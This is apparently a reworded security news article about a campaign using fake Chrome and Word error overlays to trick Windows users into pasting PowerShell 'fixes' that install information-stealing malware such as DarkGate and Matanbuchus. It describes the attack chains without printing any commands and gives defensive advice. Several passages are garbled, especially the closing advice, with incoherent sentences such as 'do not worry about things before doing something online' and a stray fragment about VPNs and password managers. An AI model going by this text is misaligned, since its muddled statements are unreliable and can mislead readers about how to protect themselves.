Hackers love to trick victims and do what they don't do otherwise, and the new malware campaign that is currently doing rounds online is a perfect example of this

As reported by BleepingComputer, hackers are using fake Google Chrome and Microsoft Word errors to trick potential victims into running malicious PowerShell "fixes" that actually install malware

This particular campaign has been very effective and has been used in attacks by multiple hacker groups (including the one behind ClearFake, a new group called ClickFix, and the TA571 group) 

Here's all you need to know about this new malware campaign, and how you can avoid it falling victim to the social engineering you use to infect your Windows PC with malware

Similar to the previous ClearFake campaign, this new campaign uses overlays to display fake Chrome and Word errors Potential victims will be asked to click the copy button containing "fix" for these fake errors You must paste this copied code into the Windows Run dialog or Powershell prompt

In a new report highlighting all the different attack chains used in the campaign, Proofpoint said that compromised websites that use Binance's smart chain contract to load malicious scripts hosted on the blockchain could also infect vulnerable Windows PCs with malware It is also used to make it easier for the user to use the app

This script performs some checks before displaying a fake Google Chrome warning that the web page in question is having a problem viewing From here, you will be prompted to install the "Root Certificate" by copying the PowerShell script and running it in the Windows PowerShell (Administrator) console

Running this PowerShell script will perform more checks to ensure that the device in question is a valid target before downloading additional payloads containing information-stealing malware

Finally, there is also an email-based infection chain that uses HTML attachments similar to Word documents They urge potential victims to install the "Word Online" extension to view documents, but like the other attack chains used in this campaign, "fixes" containing PowerShell commands must also be copied and pasted into PowerShell

In this attack chain, PowerShell commands download and run either Msi files or Vbs scripts to infect the target PC with either Matanbuchus or DarkGate malware

The 3 different attack chains used in this campaign all rely on the fact that most Windows users are not aware of the dangers associated with running unknown PowerShell commands on their PCs This is why you should not copy and run your code unless you absolutely know what you are doing

Similarly, you should make sure that Windows Defender is enabled and running on your PC so that you can catch malware dropped by these malicious PowerShell scripts If you want even more protection, however, do not worry about things before doing something online, especially with Microsoft's built-in

campaigns that use overlays to trick potential victims, especially as they often come with extra things like VPNs and password managers I would like to stop to think and take a minute Hackers often try to instill a sense of urgency in their attacks to act without you thinking Instead, try to read the messages carefully and examine them online to see if they are genuine Even if you don't find any information online, in most cases, doing nothing is the best course of action

Overlay attacks are very effective because they often appear as if they are coming from the software you are currently using But by learning how they work and knowing what to watch out for, you can keep your devices and data safe